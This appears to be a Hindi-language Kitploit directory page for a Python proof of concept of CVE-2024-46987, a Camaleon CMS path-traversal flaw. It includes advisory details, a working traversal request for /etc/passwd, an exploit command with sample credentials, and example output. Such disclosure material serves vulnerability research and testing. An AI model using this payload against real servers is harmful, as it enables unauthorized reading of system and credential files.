Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-46987 — Python का उपयोग करके बनाया गया Exploit | Kitploit
उपकरण/GitHubGitHub/advaitpathak21/cve-2024-46987
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubadvaitpathak21/cve-2024-46987

CVE-2024-46987

Python का उपयोग करके बनाया गया Exploit

रिपॉजिटरी देखें
16 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-46987 – Camaleon CMS प्रमाणित पाथ ट्रैवर्सल / मनमाना फ़ाइल पठन

CVSS 7.7 High Python PoC

CVE-2024-46987 Camaleon CMS (Ruby on Rails-आधारित सामग्री प्रबंधन प्रणाली) में एक प्रमाणित पाथ ट्रैवर्सल भेद्यता (CWE-22) है। यह एक लॉग-इन उपयोगकर्ता (कम विशेषाधिकारों वाले को भी) को MediaController#download_private_file एक्शन के माध्यम से सर्वर पर मनमानी फ़ाइलें पढ़ने की अनुमति देता है।

  • प्रकाशित: 18 सितंबर, 2024
  • CVSS v3.1: 7.7 उच्च
    वेक्टर: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
  • CWE: CWE-22 (प्रतिबंधित निर्देशिका में पाथनाम की अनुचित सीमा), CWE-200 (संवेदनशील जानकारी का प्रकटीकरण)
  • प्रभावित संस्करण: Camaleon CMS ≤ 2.8.0 (कुछ रिपोर्टों के अनुसार यह 2.9.0 पर भी काम करता है)
  • पैच किया गया: ≥ 2.8.2 (अनुशंसित: नवीनतम 2.8.x या 2.9.x में अपग्रेड करें)
  • परामर्श (Advisories):
    • GitHub Advisory GHSA-cp65-5m9r-vc2c
    • NVD CVE-2024-46987
    • GitHub Security Lab GHSL-2024-183

भेद्यता अवलोकन

मान्य क्रेडेंशियल वाला एक हमलावर निम्नलिखित पर एक क्राफ्टेड अनुरोध भेज सकता है: /admin/media/download_private_file?file=../../../../etc/passwd

आवश्यकताएँ स्थापित करना

  • pip install -r requirements.txt

या

  • pip install -r requests fire

उपयोग

  • पहले एक नया उपयोगकर्ता बनाएँ
root@kitploit:~
python cms-exploit.py \
  --url http://target.local \
  --username neal \
  --password 'Caffery@123' \
  --cmd /etc/passwd
  • उदाहरण आउटपुट:
root@kitploit:~
[+] Login successful
[*] Requesting: http://target.local/admin/media/download_private_file?file=../../../etc/passwd
[+] Success – content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
.
.

नोट: स्क्रिप्ट Rails-शैली लॉगिन फ़ॉर्म (user[email], user[password], authenticity_token) मानती है। यदि आपका लक्ष्य कस्टम नामों का उपयोग करता है तो पेलोड फ़ील्ड समायोजित करें।

कानूनी एवं नैतिक चेतावनी

यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण प्रयोजनों के लिए प्रदान किया गया है।

इसका उपयोग केवल उन्हीं प्रणालियों पर करें जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है (जैसे, बग बाउंटी प्रोग्राम, आंतरिक पेनटेस्ट, HTB जैसी प्रयोगशालाएँ)। अनधिकृत उपयोग कानूनों का उल्लंघन कर सकता है। लेखक दुरुपयोग के लिए ज़िम्मेदार नहीं है।

टूल डाउनलोड करें